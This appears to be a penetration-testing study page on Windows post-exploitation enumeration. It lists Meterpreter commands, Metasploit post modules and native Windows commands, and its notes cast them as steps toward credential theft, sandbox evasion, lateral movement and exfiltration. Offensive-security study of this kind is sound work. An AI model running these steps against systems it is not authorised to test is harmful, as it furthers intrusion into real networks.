Enumeration

1. Enumerating System Information

Gather basic system information:

systeminfo
sysinfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

  • systeminfo: Displays OS version, architecture, and patches.

  • sysinfo: Similar, used within Meterpreter.

  • wmic qfe get ...: Lists installed Windows updates.

2. Enumerating Users & Groups

Meterpreter Commands:

getuid          # Get current user
getprivs        # Get available privileges
background      # Background current session
use post/windows/gather/enum_logged_on_users
set SESSION 1
run
sessions 1
shell

Windows Commands:

whoami
whoami /priv        # Check user privileges
net users           # List all users
net user administrator  # Check admin user details
net localgroup
net localgroup administrators

  • whoami /priv: Identifies privilege escalation vectors.

  • net users: Lists local user accounts.

  • net localgroup administrators: Checks administrator group members.

3. Enumerating Network Information

ipconfig             # Show basic network details
ipconfig /all        # Show detailed network config (DNS, DHCP, MAC)
route print          # Display routing table
arp -a              # Show ARP cache (connected hosts)
netstat -ano        # Show active network connections and listening ports

  • ipconfig /all: Useful for finding internal IPs, gateways, and DNS servers.

  • netstat -ano: Identifies open ports and associated processes.

4. Enumerating Processes & Services

pgrep explorer.exe    # Find Explorer.exe process ID (on Linux-like shells)
migrate 2252          # Migrate to another process (in Meterpreter)
net start             # List running services
wmic service list brief  # Summarize running services
tasklist /SVC         # List processes and services
schtasks /query /fo LIST  # List scheduled tasks

  • migrate 2252: Used to migrate Meterpreter session to a stable process.

  • schtasks /query /fo LIST: Identifies scheduled tasks (potential persistence methods).

5. Automating Windows Local Enumeration

1. Enumerate Privileges

Checks the privileges of the current session to identify potential privilege escalation opportunities.

use post/windows/gather/win_privs
set SESSION 1
run

  • Identifies high-privilege rights (e.g., SeDebugPrivilege, SeImpersonatePrivilege).

  • Helps determine if the session can escalate privileges.

2. Enumerate Logged-On Users

Lists all users currently logged into the system.

use post/windows/gather/enum_logged_on_users
set SESSION 1
run

  • Useful for identifying target accounts for credential theft.

  • Helps in planning privilege escalation or lateral movement.

3. Check if the System is a Virtual Machine (VM)

Determines whether the compromised system is running inside a virtual environment.

use post/windows/gather/checkvm
set SESSION 1
run

  • Helps attackers evade sandbox environments and avoid detection.

  • Identifies Hyper-V, VMware, VirtualBox, or cloud-based VMs.

4. Enumerate Installed Applications

Lists all installed applications on the system.

use post/windows/gather/enum_applications
set SESSION 1
run

  • Helps identify security software, vulnerable applications, or useful tools.

  • May reveal password managers, remote access tools, or exploits.

5. Enumerate Computers in the Network

Gathers information about other computers in the same Windows domain or workgroup.

use post/windows/gather/enum_computers
set SESSION 1
run

  • Useful for network reconnaissance and lateral movement.

  • Identifies potential targets for further exploitation.

6. Enumerate Network Shares

Lists all network shares accessible from the compromised system.

use post/windows/gather/enum_shares
set SESSION 1
run

  • Identifies shared files and folders that may contain sensitive data.

  • Helps in data exfiltration or privilege escalation.

PreviousPost ExploitationNextKiwi

Last updated